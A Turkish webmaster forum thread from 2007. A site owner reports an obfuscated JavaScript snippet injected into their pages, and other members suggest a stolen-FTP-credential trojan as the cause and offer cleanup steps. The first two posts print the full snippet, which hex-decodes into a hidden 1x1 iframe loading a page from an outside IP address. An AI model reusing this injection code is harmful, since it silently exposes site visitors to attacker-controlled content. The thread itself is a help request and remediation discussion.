• 17-11-2007, 22:53:43
    #1
    Üyeliği durduruldu
    <!-- o65 --><script type="text/javascript">function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){func tion B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC3 0DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A1 36E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393 D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2 D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A08694 67393D621AF+=2){B23FC86F17B841112+=(String.fromCha rCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF 8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D62 1AF,2))));}document.write(B23FC86F17B841112);}E34A B0D7708CB83225AC60547C769("3C696672616D65207372633 D27687474703A2F2F35382E36352E3233332E39372F666F727 56D2F6F75742E706870272077696474683D273127206865696 768743D273127207374796C653D27646973706C61793A20686 96464656E3B273E3C2F696672616D653E");</script><!-- c65 -->

    Siteme bu kod eklenmis, daha once de belirli sikintilarim olmustu bu olay hakkinda. Ayrica soyle de bisey yapmis kendini cok zeki zanneden biri.

    BulutReklam.com.tr

    Bundan korunma yolunu biri anlatabilirse cok sevinirim.
  • 18-11-2007, 09:59:37
    #2
    phoenix adlı üyeden alıntı: mesajı görüntüle
    <!-- o65 --><script type="text/javascript">function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){func tion B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC3 0DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A1 36E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393 D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2 D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A08694 67393D621AF+=2){B23FC86F17B841112+=(String.fromCha rCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF 8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D62 1AF,2))));}document.write(B23FC86F17B841112);}E34A B0D7708CB83225AC60547C769("3C696672616D65207372633 D27687474703A2F2F35382E36352E3233332E39372F666F727 56D2F6F75742E706870272077696474683D273127206865696 768743D273127207374796C653D27646973706C61793A20686 96464656E3B273E3C2F696672616D653E");</script><!-- c65 -->
    Siteme bu kod eklenmis, daha once de belirli sikintilarim olmustu bu olay hakkinda. Ayrica soyle de bisey yapmis kendini cok zeki zanneden biri.
    BulutReklam.com.tr
    Bundan korunma yolunu biri anlatabilirse cok sevinirim.

    %99,99 bilgisayarına trojan bulaşmış.
    Bu trojan senin FTP sunucusuna baglanıp sitene ait her dosyaya bu kodu otomatik ekliyor.
    Bu kod nedir peki?
    Bu kod 1x1 boyutunda gizli iframe kodu. Trojanı bilgisayarına yerleştiren kişinin sitesine gizlidende olsa hit yolluyor senin sitene giren ziyaretçiler
    Bilgisayarına format atman tek çözüm yolu ve antivirüssüz internette sört yapmayı hiç bir zaman aklından bile geçirme bu devirde
  • 18-11-2007, 10:52:08
    #3
    Evet geçmiş olsun benimde geçende başıma geldi.

    Cuteftp home yada prof farketmiyor adamlar sadece onun için üretmişler trojanı..

    Nod32 Buyur işini görür .
  • 18-11-2007, 12:26:35
    #4
    vb scriptleri firefox çalıştırmıyor kesinlikle firefox yemez böle lamerlerin kodlarını internet explorer kullnmıyorum kullanmamda 10 20 kişiyi firefoxcu yaptım sayemde virüssuz trojansız hayatları devam ediyor tabii firefoxa da tşkler
  • 18-11-2007, 12:45:55
    #5
    Üyeliği durduruldu
    Cok tesekkurler cevaplar icin, ise koyulma vakti
  • 18-11-2007, 12:50:40
    #6
    Üyeliği durduruldu
    Geçmiş olsun aynı şey 2 ay önce benimde başıma geldi
  • 18-11-2007, 13:01:01
    #7
    Üyeliği durduruldu
    Bunu DW ile replace edebilirsin yani düzeltebilirsin.
    Fakat radminin dediğini ilkkez duyuyorum. Bana bulaşan tarzı şöyleydi.
    Phptracker ile trojan downloader bulaştırıyordu, o downloader da indiriyordu netden birşeyler.

    Çaktırmadan temizlemiştim. Ama sende biraz farklı bir durum var sanki gizlenmiş kodlar bunlar...
  • 18-11-2007, 13:13:48
    #8
    Üyeliği durduruldu
    FromETC adlı üyeden alıntı: mesajı görüntüle
    Bunu DW ile replace edebilirsin yani düzeltebilirsin.
    Fakat radminin dediğini ilkkez duyuyorum. Bana bulaşan tarzı şöyleydi.
    Phptracker ile trojan downloader bulaştırıyordu, o downloader da indiriyordu netden birşeyler.

    Çaktırmadan temizlemiştim. Ama sende biraz farklı bir durum var sanki gizlenmiş kodlar bunlar...
    DW nedir? Bir de aslinda asiri sormak ihtiyaci hissediyorum, format cozum degil diyenler var arastirmalarimda gordugum kadariyla. Basina gelenler bundan nasil kurtuldu?
  • 18-11-2007, 13:19:13
    #9
    Üyeliği durduruldu
    phoenix adlı üyeden alıntı: mesajı görüntüle
    DW nedir? Bir de aslinda asiri sormak ihtiyaci hissediyorum, format cozum degil diyenler var arastirmalarimda gordugum kadariyla. Basina gelenler bundan nasil kurtuldu?
    Şöyle diyeyim keylogger sitenize bulaşıyor.
    bilgisayarınızı temizlediğiniz anda bile sitenizde dolaşırsanız yine bulaştırıyorsunuz kendinize. Bunun için anti-viruslerin en manyağı olan Kaspersky programını kurmanız gerekiyor(internet secrutry).

    Bilgisayarınızı temizledikten sonra sitelere girmeyin. ardından FTP yardımı ile sitenizi komple indirin. Kaspersky dosyalarınızı indirdiğiniz anda her dosyayı taradığı için buluyor. Siteniz üzerinde r57,c99 gibi shell lerde varsa hepsini tespit ediyor. php dosyalarınızda yüklü olan kodları bu şekilde bulabilirsiniz. DW ise dreamweaver bununla toplu replace yapabilirsiniz. Yine farklı bir yöntem google desktop search ile örnek bir kod alıp onu aratarak varolan dosyalardaki istemediğiniz kodları çıkarabilirsiniz. yani kodların mevcut olduğu dosyaları.

    Düşündüğümüzde dahada çeşitli çözüm yolları oluşturabiliriz. Ama kim demişse temizlenmez yalan demiş.